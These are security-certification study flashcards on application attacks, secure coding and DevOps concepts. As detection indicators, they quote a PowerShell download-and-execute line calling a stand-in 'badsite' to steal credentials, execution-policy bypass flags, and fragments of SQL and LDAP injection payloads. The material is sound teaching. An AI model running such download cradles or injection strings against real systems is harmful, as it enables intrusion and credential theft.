Lesson 14 Secure App Conecpts

Question 1

TOCTOU

Answer 1

Time of Check/Time of Use

Race condition

Question 2

CSRF (or XSRF, same) Cross Site Request Forgery

Answer 2

Client Side or Cross Site Request Forgery
- exploit applications that use cookies to authenticate users and track sessions

attacker gains control of the session cookie by tricking the victim to start session with target while previously signed in to the trusted target

Question 3

SSRF Server Side Request Forgeries

Answer 3

Server Side Request Forgeries exploit the lack of authentication between internal servers and services (implicit trust) and weak input validation

• allows the server to process arbitrary requests to target another service
• allows the attacker to submit unsanitized requests or API parameters

Question 4

Session Hijacking

Answer 4

replaying a cookie in some way

attackers gain session cookies from sniffing on a public or unsecure network

Counter moves are to:

• encrypt cookies during transmission
• delete cookies from clients browser cache after session is completed
• deliver new cookie for each new session

Proper session management and token generation

• use non-predictable algorithm for token generation
• limit lifespan of a session
• require reauthentication after a certain period of time

Question 5

API Attacks

Answer 5

App Programing Interface allow consumers to automate services on a web server and cloud services
Attackers exploit
- ineffective secrets management, allowing APi Keys to be discovered
- lack of input validation, unsanitized input
- error messages which give too much details about the system or network
- DoS by bombarding with spurious calls, protect through throttling/rate limiting mechanisms

Question 6

Percent Encoding in a URL

Answer 6

Allows a user-agent to submit any safe or unsafe character to the server within a URL

% = %25
/ = %2F
\ = %5C
< = %3C
> = %3E
 = %20

Question 7

replay attack

Answer 7

using a valid session token via sniffing or guessing to re-establish a web app session illegitimately

Question 8

PtH attack

Answer 8

Pass the Hash attack

attack uses hashed password on protocols that allow hashed passwords for authentication
such as Server Message Block (SMB) or NTLM or Kerberos

good for horizontal movement

difficult attack to detect as it exploits valid network behavior

Question 9

DLL injection

Answer 9

Dynamic Link Library injection

exploits the OS functionality of allowing one process to attach to another

malware can inject a malicious library and then force a process to load it

Indicators:

• opening of unexpected network connections
• interacting with files and the registry in a suspicious manner

Question 10

DoS

Answer 10

Denial of Service
attack causing the system or service to be temporarily or permanently unavailable
-send a bombardment of spurious calls to an api
- mitigate through throttling/rate-limiting mechanisms

Question 11

SSL Stripping or HTTP Downgrade

Answer 11

• Combines a down grade attack with a man in the middle attack
• Effectively the attacker is a proxy, setting up a secure HTTP path with the server, while using an HTTP non-secure connection with the victim.
• Victim then sends credentials in the clear to the MitM who then uses the secure channel to the server

Mitigation:

• Instruct browsers not to use http
• Instruct Servers not to respond to http requests, only https requests

Question 12

Memory Leak

Answer 12

an attack that causes a device to to run out of memory (resource exhaustion) causing system instability or crash

• can lead to a DoS
  
  • starting sessions but not letting them complete causing state tables to fill
• resource exhaustion can lead to conditions for privilege escalation

Question 13

race condition

Answer 13

a condition where a service attempts to perform two operations at nearly the same time, but due to the nature of the system must be done in the correct order

can lead to a DoS or other instability

can lead to a null pointer dereference causing a app to crash

Question 14

Shimming

Answer 14

Creating or modifying a DLL, driver, or API to get an app to act in a malicious way

A type of DDL injection attack

Attacks a feature of Windows which allows for apps to run as if on legacy Window OSs

Question 15

Refactoring

Answer 15

rewriting code to perform same function but using different new methods

Malware uses to change it’s signature to avoid AV sw detection

Question 16

Normalization

Answer 16

A form of input validation

strips illegal characters from input and converted to the acceptable values prior to being entered into or processed by the database

Question 17

Execution Control
Allow list
Block list

Answer 17

Execution control is a process of determining what additional sw or scripts may be installed or run on a host beyond its baseline

Allow list

• a list of allowable processes and scripts
• highly restrictive and can impede immediate needs/fixes

Block list

• a list of processes and scripts which can not be executed on the host
• it is permissive but vulnerable to sw which has not previously been identified as malicious

Question 18

LAMP

Answer 18

LAMP (Linux, Apache, MySQL, PHP/Perl/Python) is a very common example of a web service stack, after its four original components: the Linux operating system, the Apache HTTP Server, the MySQL relational database management system (RDBMS), and the PHP programming language.

Question 19

Application Attacks

Answer 19

application vulnerabilities is a design flaw allowing security to be circumvented

• Privileged Escalation
• Error handling
• Improper Input handling

Question 20

Privilege Escalation

Answer 20

• allows for arbitrary code execution or even remote code execution
• Vertical Privilege Escalation allowing a user/app can access functionality or data not available to them
• Horizontal Privilege Escalation a user gains access to functionality or data intended for another user

Indictor:
- User or app running with higher than expected privileges

Question 21

Error handling uses in app attacks

Answer 21

App attacks can cause errors in an attempt to glean more system details

An app should not divulge too much system information when an error occurs, such as type and configuration of a database server

Question 22

Improper Input Handling

Answer 22

Most app attacks work by passing invalid or maliciously constructed data to the vulnerable process

Developers should always test for valid inputs

Usually described as overflow or injection type attacks

Question 23

Overflow app attack

Answer 23

Attacker submits input which is too large to be stored in the variable assigned by the application

Indicators

• unexplained crashes
• error messages following a download
• execution of a new app or script
• connection to new hardware

Common attack types:

• buffer overflow
• integer overflow

Question 24

Buffer Overflow

Answer 24

An attacker passes data to over fill the buffer of the stack, an area of memory used by a an application

The attacker can changed the return address or add code to execute a script (arbitrary code execution)

Question 25

Stack Overflow

Answer 25

A stack is an area of memory used by a program sub routine which includes a return address of the program which called the subroutine.

Attacker can use a buffer overflow to change the return address to call malicious code instead of returning to the calling routine.

Question 26

Integer Overflow

Answer 26

Attacker causes the target application to exceed the bounds defined by an integer to change the value from positive to negative.

Attacker could also attempt to make the buffer smaller in order allow a buffer overflow attack

Question 27

Pass the Hash

Answer 27

a credential exploit technique used for lateral movement

attacker gains a users cached credentials when logged into a single sign on system allowing attacker to use the credentials on other systems.

Usually is the hashed password and can be used on Windows file sharing protocol Server Message Block (SMB) or other protocols which accept NTLM hashes as authentication

Question 28

Click jacking

Answer 28

Victim sees and trusts an web app with page containing a malicious layer allowing an attacker to intercept or redirect user input

launched by a compromise allowing the attacker to run arbitrary code as a script

mitigate by:

• HTTP response headers instructing browsers to not open frames from different origins (domains)
• ensuring buttons or input boxes are on the top most layer

Question 29

XSS Attacks

Answer 29

Cross Site Scripting (XSS) is an application attack exploiting client browsers trust in scripts coming from a server

Three Types:
Non-Persistent/Reflective
Persistent/Stored
Client Side DOM

Involves use of input validation vulnerability

Will see or %script text in the URL crafted by an attacker

Question 30

XSS Non-Persistent/Reflective

Answer 30

Cross Site Scripting (XSS) Non-Persistent/Reflective

• requires 3 actions
• attacker identifies input validation vulnerability in the trusted site
• attacker crafts a URL performing code injection against the trusted site and sends to victim to click the link
• once URL is clicked, trusted site sends the page with the injected malicious code, and browser executes the code

Question 31

XSS Persistent/Stored Attack

Answer 31

Cross Site Scripting Persistent/Stored is an application attack

• aims to insert malicious code into a back-end database used by the trusted site
• the malicious code is then served to the client and executed on the clients browser
• this makes it persistent since all visitors will get the malicious code
• can be accomplished on sites with no input sanitation, like a message board

Question 32

XSS Client side scripts/DOM

Answer 32

Cross Site Scripting (XSS) client side scripts exploits Vulnerabilities in the client side scripts which often use the DOM to modify content and layout of a web page.

• requires site to have input validation vulnerability and be identified by the attacker
• requires attacker to craft a URL to exploit the vulnerability and user to click it. Attacker adds a call to the malicious script
• server returns the page and if script is in the DOM it will get executed in the clients browser

Question 33

SQLi Attacks

Answer 33

Structured Query Language Injection attacks utilize input validation vulnerability to craft a SQL query within the URL

• will see a true statement in the input, like ‘or 1=1’, which tells SQL to return all info from the table
• requires input to not be sanitized

Question 34

XML injection attacks

Answer 34

Exploits XML files which are not encrypted or input validated

Vulnerable to spoofing, request forgery, and injection of arbitrary data or code

Example is XML External Entity (XXE) where the SYSTEM entry is modified to some /etc file like /etc/config, which will then display the contents of the /etc/config as part of the response.

Question 35

LDAP injection Attacks

Answer 35

Lightweight Directory Access Protocol injection attacks exploit unauthenticated access or vulnerability in a client app to submit arbitrary LDAP queries.

• similar to SQL injection just a different query language
• requires input to not be sanitized and use of something like bob)&()) for a username to bypass the password portion causing the password filter to be dropped for a condition thats always true

Question 36

Directory Traversal

Answer 36

An injection attack performed against a web app server

• input allows attacker to use the (../) directory traversal to navigate to the root directory
• only works on non sanitized input and files are not properly controlled via permissions
• only works on server side file system

Question 37

Command Injection Attack

Answer 37

Attack on a web app server attempting to run OS shell commands and return output to the browser
- requires some effort to get around server security mechanisms but successful attempts is usually due to misconfiguration of the server

Question 38

Secure Coding Techniques

Answer 38

Input Validation
Normalization
Output encoding

Question 39

ServerSide vs ClientSide validation

Answer 39

Client Side

• offloads processing from Server
• gives too much control to client which could be vulnerable to malware, etc

Server Side

• More secure than client
• Not realistic in large deployment

Bad practice to rely solely on client side validation

Question 40

Web App Security - Secure Cookies

Answer 40

Secure Cookies

• avoid using persistent cookies, always new session cookies
• Set secure attributes to prevent transport over HTTP
• set HttpOnly to not allow DOM/Client-side scripting
• use SameSite attribute to control where cookie may be sent to mitigate forgery attacks

Question 41

Web Security - Response Headers important settings from server to client

Answer 41

Response headers

• HTTP Strict Transport Security (HSTS) forces browser to use HTTPS only
• Content Security Policy (CSP) to mitigate client side attacks (clickjacking, script injection, etc)
• Cache-Control to prevent caching of data to protect confidential and personal information

Question 42

Error Handling

Answer 42

Code must be written handle errors in such a way an attacker can not execute malicious code or perform an injection attack

Also do not divulge system information (platform info or inner workings of code) in the text of an error handler, better to use custom handlers to control what is displayed

Question 43

Secure Code Usage

Answer 43

Code reuse - could expose vulnerability when used in a new set of conditions

3rd party library - need to monitor for vulnerabilities

SDK (software development kit) - need to monitor for vulnerabilities

Stored Procedures - provides a more secure method for DB queries as the queries are predefined

Question 44

Dead Code

Answer 44

Should be removed as it is could be misused by an attack to exploit a vulnerability or misused in some way

Also indicates code is not well maintained

Question 45

Obfuscation

Answer 45

Use of an obfuscator on the compiled code to make the code more difficult to reverse engineer or mentally tough to analyze.

A obfuscator randomizes the names of variables, constants, functions and procedures, as well as, removes comments, spaces of the compiled code.

Question 46

Static Code Analysis

Answer 46

Analysis of code prior to being packaged as an executable.
Table Tops/code reviews of the code by others than the developer is ideal as it can detect potential issues or code to assist an insider threat, such as backdoors, logic bombs.
- can run source code analysis sw to scan for signatures of known issues, such as the OWASP top 10 or injection vulnerabilities

Question 47

Dynamic Code Analysis

Answer 47

Testing code under real world conditions using a staging environment

Fuzzing

• testing the input validation routines of code.
• can be test or a vulnerability scanner to exercise random inputs, valid and invalid, to the code and reports the results
• several types of fuzzers, Application UI, Protocol, and File Format

Question 48

Code Signing

Answer 48

provides authenticity and integrity of the code

• developer creates a hash of the code and then signs it using their private key
• code is shipped with the developers code signing certificate which contains a public key for the dest computer uses to read and verify the signature
• The OS then prompts the user to accept or deny the code

Question 49

OS based execution control

Answer 49

Execution control is allow/block lists managed by an OS using 3rd party sec tools:

Windows built in features for this:

• Software Restriction Policies (SRP)
• AppLocker
• Windows Defender Application Control (WDAC)

Linux

• uses MAC (Mandatory Access Control) kernel module
• or Linux Security Module (LSM)
  
  • SELinux
  • AppArmor

Question 50

Malicous Code Indicators

Answer 50

Main types of malicious activities when threat hunting or using a sandbox:
ShellCode - small program to exploit buffer overflow to gain privileges and then attack a network connection for downloading additional tools

Credential Dumping - access to credentials files or sniffing memory by the Isass.exe sys process

Lateral movement/insider attack - executing process remotely (psexec) to widen access by opening firewall ports or creating an account

Persistence - a backdoor an attacker uses when the host is restarted or user logs off. Look for AutoRun keys in the registry, adding a scheduled task, etc.

Question 51

PowerShell malicious indicators

Answer 51

Cmdlets invoked to run some binary shell code
PowerShell.exe “IEX (New-Object NetWebClient) Downloadstring (‘https: //badsite); Do-Evil -StealCreds

Bypassing execution policy
-noprofile or -ExecutionPolicy bypass arguments

System calls to the Windows API
[Kernal32]::LoadLibrary(.dll)

Using another type of script to execute the PowerShell is also suspicious

Question 52

Bash and Python Malicious Indicators

Answer 52

Use of whoami and ifconfig/ipconfig to establish local context

Use of wget or curl to download tools

crontab entries added to enable persistence

add user to sudo and enable remote access via ssh

use iptables to change firewall rules

use nmap to scan other hosts

use of a reverse shell

high cpu usage and memory as happens with a crypto miner program, use top and free to diagnose

Question 53

Macros and VB applications

Answer 53

A malicious actor could use Word document as a vector to execute a PowerShell script using a macro

Question 54

Man in the Browser attack

Answer 54

An on path attack where the web browser is compromised

Requires privileges and allows the attacker to inspect session cookies, certs, and data, change browser settings, perform redirection and inject code

Attackers use various sw kits installed on web servers which then down load plugins or scripts to the client when visiting the server

Question 55

Automaton Scalabilty

Answer 55

The costs involved in supplying the service to more users is linear

if number of users double the cost to maintain the same level of service would also double. If more that double, then the service is less scalable

Question 56

Automation Elasticity

Answer 56

The systems ability to handle changes on demand in real time.

High elasticity means the system will not experience loss of service or performance if the demand suddenly doubles.

The converse is also true, when demand is low the costs are reduced

Being able to reduce power or shut down when demand is low. When demand picks up the resource can grow in power to the level required.

Question 57

SecDevOps environments

Answer 57

Development - code is developed

Test/integration - code from developers are merged together for initial testing, code builds and requirements met

Staging - a mirror of the production environment, focusing on usability and performance using test data

Production - application is released to end users

Question 58

Provisioning

Answer 58

Process of deploying an application to the target environment

Question 59

Deprovisioning

Answer 59

Process of removing an application from packages or instances

Question 60

Version Control

Answer 60

An ID system for each iteration of a software product

Question 61

Continuous Integration

Answer 61

developers should commit and test updates often

Effective CI uses automation test suite to validate each build quickly

Question 62

Continuous Delivery

Answer 62

Testing the infrastructure that supports the app, including networking, database functionality, client sw, etc

Question 63

Continuous Deployment

Answer 63

process of actually making changes to the production environment to support the new app version

Question 64

Continuous Monitoring

Answer 64

used to detect service failures and security incidents

should include monitoring of failover components

this capability is provided by security orchestration and response (SOAR) management sw

Question 65

Continuous Validation

Answer 65

A verification and validation of a requirements model

Verification - ensures the product or system meets design goals

Validation - process to determine whether the appliaction is fit-for-purpose

must ensure there is no drift from secure configuration baseline